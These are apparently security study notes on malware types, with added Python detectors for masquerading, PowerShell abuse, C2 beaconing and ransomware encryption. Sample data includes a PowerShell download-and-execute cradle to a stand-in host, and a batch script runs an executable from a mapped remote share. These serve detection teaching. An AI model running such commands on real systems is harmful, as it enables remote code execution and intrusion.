Malware
Overview
Malware is software that is detrimental to the operation of the host. In the early days, all malware started out as viruses, which spread across a network and replicate only through explicit user interaction.
A malware attack, or exploit technique, is the specific method by which malware code infects a target host.
- Malware can insert a malicious macro into a document file.
- Other malware focuses on infecting memory or other system resources.
- Modern malware uses fileless techniques to avoid detection.
PUPs (Potentially Unwanted Programs) are software that may have negative or undesirable effects.
- Crapware, adware, spyware, bloatware
Fileless Malware
Creates a process in system memory without relying on a file on local disk.
- Difficult to detect; leaves very few indicators of compromise.
- Some variants temporarily write data to disk, but they erase those artifacts after execution.
Two-stage Deployment
Most modern malware uses a two-stage deployment.
Step 1: Dropper or Downloader
- A user clicks a malicious link or opens a malicious file, which then installs the malware.
- Usually created as lightweight shellcode that can be executed on a given system.
- Dropper - Initiates or runs the malware contained in a payload on the infected host.
- Downloader - Retrieves additional tools after the initial infection by the dropper.
- Shellcode - Lightweight code meant to execute an exploit on a given target.
Step 2: Downloader
- A second downloader installs a remote access trojan (RAT).
- Used for command and control (C2) of the victimized system.
Actions on Objective
Once the attackers have spread their footprint across your network and established a stronghold, they can transition into the "Actions on Objectives" phase. In this phase, the attackers execute their primary objectives.
Concealment
Final step of the attack. It helps the threat actor prolong unauthorized access to the system, which can be done by hiding tracks, erasing log files, or hiding any other evidence.
Malware Delivery
Common Deployment Techniques
Common techniques to deploy malicious code:
- Code Injection - Inserts malicious code into a legitimate process's address space so that it executes under that process's context.
- DLL Sideloading - Loads a malicious DLL by placing it in a directory where a legitimate application will mistakenly load it.
- DLL Injection - Forces a running process to load a malicious DLL, enabling the attacker to control the process.
- Masquerading - Disguises malicious files or processes as legitimate ones to avoid detection.
- Process Hollowing - Replaces the code of a legitimate process with malicious code while the process is running, allowing the attacker to execute their code under the guise of the legitimate process.
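Two of the techniques above, masquerading and DLL sideloading, share a simple detection signal: a well-known file name appearing in a directory where it does not belong. The script below is an added example (not from the original notes) that applies that check to a process snapshot. The expected-location table and the snapshot are constructed for the example; a real allowlist would be built from a golden image or vendor catalogue, and the snapshot would come from EDR or a process-listing tool.

```python
from pathlib import PureWindowsPath
from typing import Dict, List, Optional, Set, Tuple

# Constructed reference table (assumption): where well-known Windows binaries
# and DLLs normally live. A production allowlist would be far larger.
EXPECTED_LOCATIONS: Dict[str, Set[str]] = {
    "svchost.exe": {r"c:\windows\system32", r"c:\windows\syswow64"},
    "lsass.exe": {r"c:\windows\system32"},
    "explorer.exe": {r"c:\windows"},
    "version.dll": {r"c:\windows\system32", r"c:\windows\syswow64"},
    "dbghelp.dll": {r"c:\windows\system32", r"c:\windows\syswow64"},
}


def split_path(path: str) -> Tuple[str, str]:
    """Return (lower-cased file name, lower-cased parent directory)."""
    p = PureWindowsPath(path)
    return p.name.lower(), str(p.parent).lower().rstrip("\\")


def check_process(image_path: str) -> Optional[str]:
    """Masquerading check: a well-known binary name running from a directory
    other than the ones it is expected in."""
    name, parent = split_path(image_path)
    expected = EXPECTED_LOCATIONS.get(name)
    if expected is None or parent in expected:
        return None
    return f"masquerading: {name} running from {parent}"


def check_module(process_dir: str, module_path: str) -> Optional[str]:
    """DLL sideloading check: a system DLL name loaded from the application's
    own directory instead of a system directory (search-order abuse)."""
    name, parent = split_path(module_path)
    expected = EXPECTED_LOCATIONS.get(name)
    if expected is None or parent in expected:
        return None
    if parent == process_dir.lower().rstrip("\\"):
        return f"dll sideloading: {name} loaded from application directory {parent}"
    return f"unexpected module path: {name} loaded from {parent}"


def scan(snapshot: List[dict]) -> List[Tuple[int, str]]:
    """Run both checks over a snapshot of
    {"pid": int, "image": str, "modules": [str, ...]} entries."""
    findings: List[Tuple[int, str]] = []
    for proc in snapshot:
        finding = check_process(proc["image"])
        if finding:
            findings.append((proc["pid"], finding))
        process_dir = str(PureWindowsPath(proc["image"]).parent)
        for module in proc.get("modules", []):
            finding = check_module(process_dir, module)
            if finding:
                findings.append((proc["pid"], finding))
    return findings


# Constructed sample snapshot, not real telemetry.
SAMPLE_SNAPSHOT = [
    {"pid": 880, "image": r"C:\Windows\System32\svchost.exe",
     "modules": [r"C:\Windows\System32\version.dll"]},
    {"pid": 4120, "image": r"C:\Users\Public\svchost.exe", "modules": []},
    {"pid": 5210, "image": r"C:\Program Files\VendorApp\vendorapp.exe",
     "modules": [r"C:\Program Files\VendorApp\version.dll"]},
]

if __name__ == "__main__":
    for pid, finding in scan(SAMPLE_SNAPSHOT):
        print(pid, finding)
```

In the sample, pid 4120 is flagged for masquerading (svchost.exe outside System32) and pid 5210 for sideloading (version.dll loaded from the application's own folder). Path comparison alone does not prove malice, so in practice the finding is confirmed with the file's signature and hash before responding.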
Living off the Land
A strategy adopted by many Advanced Persistent Threats (APTs) and criminal organizations.
- Threat actors abuse standard, built-in system tools to perform intrusions, so no new binary needs to be dropped.
- Example: manipulating PowerShell to conduct malicious activities.
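Because living-off-the-land activity uses a legitimate binary, detection has to look at how the tool is invoked rather than at the file itself. The script below is an added example (not part of the original notes) that scores PowerShell command lines against a small set of well-known abuse indicators. The indicator table, the "pid|user|commandline" event format and the sample events are all constructed for the example.

```python
import re
from typing import Dict, List

# Constructed heuristic table (assumption): regex over the command line plus a
# label. These are common patterns seen in PowerShell abuse, not a full ruleset.
INDICATORS = [
    (re.compile(r"-(?:e|ec|enc|encodedcommand)\b", re.I), "encoded command"),
    (re.compile(r"-(?:w|windowstyle)\s+hidden", re.I), "hidden window"),
    (re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I), "execution policy bypass"),
    (re.compile(r"-(?:nop|noprofile)\b", re.I), "profile skipped"),
    (re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I), "download cradle"),
    (re.compile(r"\biex\b|invoke-expression", re.I), "dynamic evaluation"),
]


def score_command(cmdline: str) -> List[str]:
    """Return the labels of every indicator that matches the command line."""
    return [label for pattern, label in INDICATORS if pattern.search(cmdline)]


def is_suspicious(cmdline: str) -> bool:
    """An encoded command alone, or any two indicators together, is escalated.
    A single benign flag such as -NoProfile is common in admin scripts."""
    hits = score_command(cmdline)
    return "encoded command" in hits or len(hits) >= 2


def triage(events: List[str]) -> List[Dict]:
    """Parse constructed 'pid|user|commandline' events and score each one."""
    results = []
    for line in events:
        pid, user, cmd = line.split("|", 2)
        results.append({
            "pid": int(pid),
            "user": user,
            "hits": score_command(cmd),
            "suspicious": is_suspicious(cmd),
        })
    return results


# Constructed sample events (not real logs); example.invalid is a reserved name.
SAMPLE_EVENTS = [
    "4312|DOMAIN\\alice|powershell.exe -NoProfile -Command Get-Service -Name Spooler",
    "5788|DOMAIN\\svc_backup|powershell.exe -nop -w hidden -ep bypass -c "
    "\"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')\"",
    "6012|DOMAIN\\bob|powershell.exe -EncodedCommand SQBFAFgA",
    "6120|DOMAIN\\carol|powershell.exe -File C:\\scripts\\inventory.ps1",
]

if __name__ == "__main__":
    for row in triage(SAMPLE_EVENTS):
        flag = "SUSPICIOUS" if row["suspicious"] else "ok"
        print(f'{row["pid"]:>5} {row["user"]:<20} {flag:<10} {", ".join(row["hits"])}')
```

Only the second and third events are escalated: the first uses a single common flag and the last runs a named script with no other indicators. Heuristics like these are a starting point; the reliable source for this kind of detection is PowerShell script block logging, which records the decoded script regardless of how it was launched.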
Remote Access Trojan (RAT)
A Remote Access Trojan (RAT) is malware that gives an attacker remote control over a victim’s computer. It can silently execute commands, steal data, install other malware, or spy on user activity.
- The earliest known version was a Tetris game that had been infected with a trojan.
- The game was installed on floppy disks and shared between friends.
As an example, the script below shows suspicious behavior often linked to RATs:
@echo off
rem Hides command output from the user (the @echo off above)
rem Disguises the script as a normal maintenance task
rem Update system components
rem Connects to an external network share without user approval
net use Y: \\192.168.45.100\update_repo /user:update_agent /p:yes
rem Runs a potentially malicious executable from the network share
Y:\utilities\update_sync.exe
rem Removes the mapped drive to hide activity
net use Y: /delete
The file update_sync.exe exhibits characteristics typical of a Remote Access Trojan (RAT):
- It's not approved or authorized by security controls
- Communicates with an external IP address
- Executes remote commands on the host system
- Can be used to exfiltrate data or deploy additional malware
Reverse Proxy Backdoor
A reverse proxy backdoor is malware that opens an outbound connection from a victim's system to an attacker's server, bypassing firewalls and NAT.
- Attacker sets up a remote server to accept connections
- Traffic is relayed to internal systems
- Malware connects to that server
- It then waits for commands to proxy requests or move laterally
This backdoor is often hidden in legitimate apps or updates and can be hard to detect, especially if it uses encryption or mimics trusted services.
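Both a RAT's command-and-control channel and a reverse proxy backdoor share one observable property: the implant calls out on a schedule so that the operator's server always has a live channel. The script below is an added example (not from the original notes) that looks for that beaconing pattern in an outbound-connection log by measuring how regular the gaps between connections are. The log format, the timings and the 203.0.113.10 destination (a reserved documentation address) are constructed; update_sync.exe is the executable named in the batch script above.

```python
from collections import defaultdict
from statistics import mean, pstdev
from typing import Dict, List, Tuple

# Constructed log shape (assumption): (timestamp_seconds, process, dst_ip, dst_port).
Connection = Tuple[int, str, str, int]

SAMPLE_CONNECTIONS: List[Connection] = [
    # Implant checking in roughly every 60 s with a little jitter.
    (0, "update_sync.exe", "203.0.113.10", 443),
    (61, "update_sync.exe", "203.0.113.10", 443),
    (119, "update_sync.exe", "203.0.113.10", 443),
    (181, "update_sync.exe", "203.0.113.10", 443),
    (240, "update_sync.exe", "203.0.113.10", 443),
    (302, "update_sync.exe", "203.0.113.10", 443),
    (359, "update_sync.exe", "203.0.113.10", 443),
    (420, "update_sync.exe", "203.0.113.10", 443),
    # A browser: bursty, human-driven timing to the same site.
    (5, "chrome.exe", "198.51.100.5", 443),
    (9, "chrome.exe", "198.51.100.5", 443),
    (47, "chrome.exe", "198.51.100.5", 443),
    (52, "chrome.exe", "198.51.100.5", 443),
    (130, "chrome.exe", "198.51.100.5", 443),
    (131, "chrome.exe", "198.51.100.5", 443),
    (300, "chrome.exe", "198.51.100.5", 443),
    (301, "chrome.exe", "198.51.100.5", 443),
    # Too few connections to judge.
    (10, "outlook.exe", "198.51.100.20", 443),
    (700, "outlook.exe", "198.51.100.20", 443),
    (1400, "outlook.exe", "198.51.100.20", 443),
]


def find_beacons(connections: List[Connection],
                 min_count: int = 6,
                 max_cv: float = 0.2) -> List[Dict]:
    """Group connections by (process, destination) and flag series whose
    inter-connection gaps are regular: coefficient of variation
    (stddev / mean) at or below max_cv, with at least min_count samples."""
    series: Dict[Tuple[str, str, int], List[int]] = defaultdict(list)
    for ts, proc, ip, port in connections:
        series[(proc, ip, port)].append(ts)

    beacons = []
    for (proc, ip, port), times in series.items():
        if len(times) < min_count:
            continue
        times.sort()
        gaps = [later - earlier for earlier, later in zip(times, times[1:])]
        avg = mean(gaps)
        if avg == 0:
            continue  # duplicate timestamps; nothing to measure
        cv = pstdev(gaps) / avg
        if cv <= max_cv:
            beacons.append({
                "process": proc,
                "dst": f"{ip}:{port}",
                "count": len(times),
                "interval": round(avg, 1),
                "jitter": round(cv, 3),
            })
    return beacons


if __name__ == "__main__":
    for b in find_beacons(SAMPLE_CONNECTIONS):
        print(f'{b["process"]} -> {b["dst"]}: {b["count"]} connections, '
              f'every {b["interval"]}s (cv={b["jitter"]})')
```

Only the update_sync.exe series is reported; the browser traffic has a much larger spread between gaps and the mail client has too few samples. Real implants add deliberate jitter, so the threshold is a tuning knob, and the result is a lead to pivot on (process hash, destination reputation, data volume) rather than a verdict.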
Ransomware
Ransomware is malicious software that locks or encrypts data and demands payment to restore access.
- Blocks access to a computer or files until the ransom is paid.
- Spreads via phishing emails, malicious attachments, or drive-by downloads.
- Examples: WannaCry, CryptoLocker, Ryuk.
Paying the ransom does not guarantee data recovery and may encourage repeat or broader attacks.
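One host-side signal that files are being encrypted in bulk is a jump in their byte entropy: readable documents score well under 8 bits per byte, ciphertext sits close to it. The script below is an added example (not from the original notes) that computes Shannon entropy per file and separates already-compressed formats, which are legitimately high-entropy, from likely-encrypted ones using their magic bytes. The file contents, the 7.5-bit threshold and the short magic-byte allowlist are constructed assumptions for the example.

```python
import math
import random
from collections import Counter
from typing import Dict

# Constructed allowlist (assumption): formats that are high-entropy by design.
KNOWN_HIGH_ENTROPY_MAGIC = {
    b"PK\x03\x04": "zip (also docx/xlsx/pptx)",
    b"\x89PNG": "png",
    b"\xff\xd8\xff": "jpeg",
    b"\x1f\x8b": "gzip",
}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty or single-valued input, at most 8.0."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def classify(data: bytes, threshold: float = 7.5) -> str:
    """Label a file body as known-compressed, likely-encrypted or normal."""
    for magic in KNOWN_HIGH_ENTROPY_MAGIC:
        if data.startswith(magic):
            return "known-compressed"
    return "likely-encrypted" if shannon_entropy(data) >= threshold else "normal"


def triage_files(files: Dict[str, bytes]) -> Dict[str, str]:
    """Classify every (name -> content) pair; a real tool would read from disk."""
    return {name: classify(content) for name, content in files.items()}


def _pseudo_random_bytes(n: int, seed: int) -> bytes:
    """Deterministic stand-in for ciphertext (constructed sample data only)."""
    rng = random.Random(seed)
    return bytes(rng.getrandbits(8) for _ in range(n))


# Constructed sample files, not real user data.
SAMPLE_FILES = {
    "notes.txt": b"Quarterly revenue summary for the finance team. " * 80,
    "notes.txt.locked": _pseudo_random_bytes(4096, seed=7),
    "photos.zip": b"PK\x03\x04" + _pseudo_random_bytes(2048, seed=11),
}

if __name__ == "__main__":
    for name, content in SAMPLE_FILES.items():
        print(f"{name:<18} {shannon_entropy(content):.2f} bits/byte  {classify(content)}")
```

A single high-entropy file means little; the ransomware signal is many files crossing the threshold in a short window, typically alongside renames to a new extension and a dropped ransom note, so this check is meant to feed a rate-based alert rather than fire on its own.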
Keylogger
A keylogger is software or hardware that captures every keystroke typed on a device, usually without the user’s knowledge.
- Originally created to help in troubleshooting.
- Captured key strokes are sent to the threat actor.
- Can be installed by malware or physical access to the device.
- Often used as part of spyware or targeted attacks.
Spyware
Spyware is unwanted software that secretly collects user data and monitors activity without consent.
- Tracks browsing habits, keystrokes, or system usage in the background.
- May send data to third parties for financial or surveillance purposes.
- Often bundled with free software or installed via phishing.
- Can degrade performance and pose serious privacy risks.
Spyware can cause a computer to slow down or freeze. It can also cause the mouse pointer to disappear.
Bloatware
Bloatware refers to unnecessary or pre-installed software that consumes system resources without providing value to the user.
- Typically comes preloaded by manufacturers or vendors.
- Slows down system performance and startup time.
- May include trialware, ads, or partner apps that clutter the system.
While not inherently malicious, it can reduce user control and introduce vulnerabilities through unpatched or unneeded components.
Adware
Adware is software designed to display or inject unwanted ads, often bundled with free programs.
- May redirect browser traffic or show pop-ups.
- Can also change the browser homepage or default search engine.
- Often installed during software downloads.
- Some adware tracks user behavior to serve targeted ads.
Though less harmful than spyware or ransomware, adware still poses privacy and security concerns.